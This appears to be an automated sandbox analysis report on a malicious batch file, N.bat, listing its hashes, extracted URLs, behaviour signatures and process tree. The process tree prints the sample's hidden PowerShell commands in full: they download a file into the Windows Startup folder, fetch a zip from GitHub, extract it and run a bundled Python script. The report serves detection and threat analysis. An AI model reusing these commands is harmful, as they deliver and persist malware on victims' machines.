Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
11-05-2024 09:50
Static task
static1
Behavioral task
behavioral1
Sample
N.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
N.bat
Resource
win7-20240215-en
Behavioral task
behavioral3
Sample
N.bat
Resource
win10v2004-20240508-en
General
-
Target
N.bat
-
Size
28KB
-
MD5
a32f8b613ddf66ea93311118d63bd110
-
SHA1
fd19d211cf4b5feb8beaf5a41daca864ae6e02c6
-
SHA256
9fb8611f27b895e6d7a42435ea9b2fb13f18b2e9ccdb715ecf3281d75e3be0fb
-
SHA512
e0372c6e8ee4a0ee2fede0f5579d84f1fd34db57fac0c203e53e4289980e58d53533deca29e637efb4a336003eb55e74ec192a175e8e008883b241d0ce005f03
-
SSDEEP
768:Wjj49w9xfoeRkPEE/Z4eFVohU24vN1UZ3t8XYDTZvQlhXNM47PGZYqU6Qa31lqHZ:IOZ4eFVohU24vNBORQlhXNM47Pq2L+ls
Malware Config
Extracted
https://github.com/sdvsdv23rbfdb3/kjkj/raw/main/1
Extracted
https://github.com/bao3125/ff/raw/main/Documen.zip
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exeflow pid process 5 3060 powershell.exe 6 3060 powershell.exe 8 2488 powershell.exe 9 2488 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 2488 powershell.exe 2464 powershell.exe 3008 powershell.exe 3060 powershell.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecure.bat powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 3060 powershell.exe 2488 powershell.exe 2464 powershell.exe 3008 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3060 powershell.exe Token: SeDebugPrivilege 2488 powershell.exe Token: SeDebugPrivilege 2464 powershell.exe Token: SeDebugPrivilege 3008 powershell.exe -
Suspicious use of WriteProcessMemory 39 IoCs
Processes:
cmd.exedescription pid process target process PID 2416 wrote to memory of 2296 2416 cmd.exe chcp.com PID 2416 wrote to memory of 2296 2416 cmd.exe chcp.com PID 2416 wrote to memory of 2296 2416 cmd.exe chcp.com PID 2416 wrote to memory of 1664 2416 cmd.exe find.exe PID 2416 wrote to memory of 1664 2416 cmd.exe find.exe PID 2416 wrote to memory of 1664 2416 cmd.exe find.exe PID 2416 wrote to memory of 1856 2416 cmd.exe findstr.exe PID 2416 wrote to memory of 1856 2416 cmd.exe findstr.exe PID 2416 wrote to memory of 1856 2416 cmd.exe findstr.exe PID 2416 wrote to memory of 2376 2416 cmd.exe findstr.exe PID 2416 wrote to memory of 2376 2416 cmd.exe findstr.exe PID 2416 wrote to memory of 2376 2416 cmd.exe findstr.exe PID 2416 wrote to memory of 2368 2416 cmd.exe findstr.exe PID 2416 wrote to memory of 2368 2416 cmd.exe findstr.exe PID 2416 wrote to memory of 2368 2416 cmd.exe findstr.exe PID 2416 wrote to memory of 1708 2416 cmd.exe findstr.exe PID 2416 wrote to memory of 1708 2416 cmd.exe findstr.exe PID 2416 wrote to memory of 1708 2416 cmd.exe findstr.exe PID 2416 wrote to memory of 2852 2416 cmd.exe cmd.exe PID 2416 wrote to memory of 2852 2416 cmd.exe cmd.exe PID 2416 wrote to memory of 2852 2416 cmd.exe cmd.exe PID 2416 wrote to memory of 1948 2416 cmd.exe find.exe PID 2416 wrote to memory of 1948 2416 cmd.exe find.exe PID 2416 wrote to memory of 1948 2416 cmd.exe find.exe PID 2416 wrote to memory of 2328 2416 cmd.exe cmd.exe PID 2416 wrote to memory of 2328 2416 cmd.exe cmd.exe PID 2416 wrote to memory of 2328 2416 cmd.exe cmd.exe PID 2416 wrote to memory of 3060 2416 cmd.exe powershell.exe PID 2416 wrote to memory of 3060 2416 cmd.exe powershell.exe PID 2416 wrote to memory of 3060 2416 cmd.exe powershell.exe PID 2416 wrote to memory of 2488 2416 cmd.exe powershell.exe PID 2416 wrote to memory of 2488 2416 cmd.exe powershell.exe PID 2416 wrote to memory of 2488 2416 cmd.exe powershell.exe PID 2416 wrote to memory of 2464 2416 cmd.exe powershell.exe PID 2416 wrote to memory of 2464 2416 cmd.exe powershell.exe PID 2416 wrote to memory of 2464 2416 cmd.exe powershell.exe PID 2416 wrote to memory of 3008 2416 cmd.exe powershell.exe PID 2416 wrote to memory of 3008 2416 cmd.exe powershell.exe PID 2416 wrote to memory of 3008 2416 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\N.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\system32\chcp.comchcp.com 4372⤵PID:2296
-
C:\Windows\system32\find.exefind2⤵PID:1664
-
C:\Windows\system32\findstr.exefindstr /L /I set C:\Users\Admin\AppData\Local\Temp\N.bat2⤵PID:1856
-
C:\Windows\system32\findstr.exefindstr /L /I goto C:\Users\Admin\AppData\Local\Temp\N.bat2⤵PID:2376
-
C:\Windows\system32\findstr.exefindstr /L /I echo C:\Users\Admin\AppData\Local\Temp\N.bat2⤵PID:2368
-
C:\Windows\system32\findstr.exefindstr /L /I pause C:\Users\Admin\AppData\Local\Temp\N.bat2⤵PID:1708
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp2⤵PID:2852
-
C:\Windows\system32\find.exefind2⤵PID:1948
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp2⤵PID:2328
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/sdvsdv23rbfdb3/kjkj/raw/main/1', 'C:\Users\Admin\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/bao3125/ff/raw/main/Documen.zip', 'C:\Users\Public\Document.zip')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2488 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2464 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\python C:\Users\Public\Document\Lib\sim.py"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tmpFilesize
14B
MD5ce585c6ba32ac17652d2345118536f9c
SHA1be0e41b3690c42e4c0cdb53d53fc544fb46b758d
SHA256589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
SHA512d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD51b5b4d82f6120ac012077a2748c487a4
SHA13a28e4991f7b2772b9c5d5f027bd54b5bd89a8ab
SHA256b5c5ebdb227c64ca85a3e280fc4d11be0fdb6f336637c1989a9a30d857235d8f
SHA51258f58235eb2ae18c2a8d99137e75539af2b027da2ec16416a74ff488e4aabf9c70d7f6dfa6b5be848481dfce40ae2532730c6779ece16a28f0bfb5c80239a218
-
memory/2488-17-0x000000001B690000-0x000000001B972000-memory.dmpFilesize
2.9MB
-
memory/2488-18-0x0000000001E80000-0x0000000001E88000-memory.dmpFilesize
32KB
-
memory/3060-8-0x0000000002BD0000-0x0000000002C50000-memory.dmpFilesize
512KB
-
memory/3060-9-0x000000001B570000-0x000000001B852000-memory.dmpFilesize
2.9MB
-
memory/3060-10-0x0000000002310000-0x0000000002318000-memory.dmpFilesize
32KB
-
memory/3060-11-0x0000000002BD0000-0x0000000002C50000-memory.dmpFilesize
512KB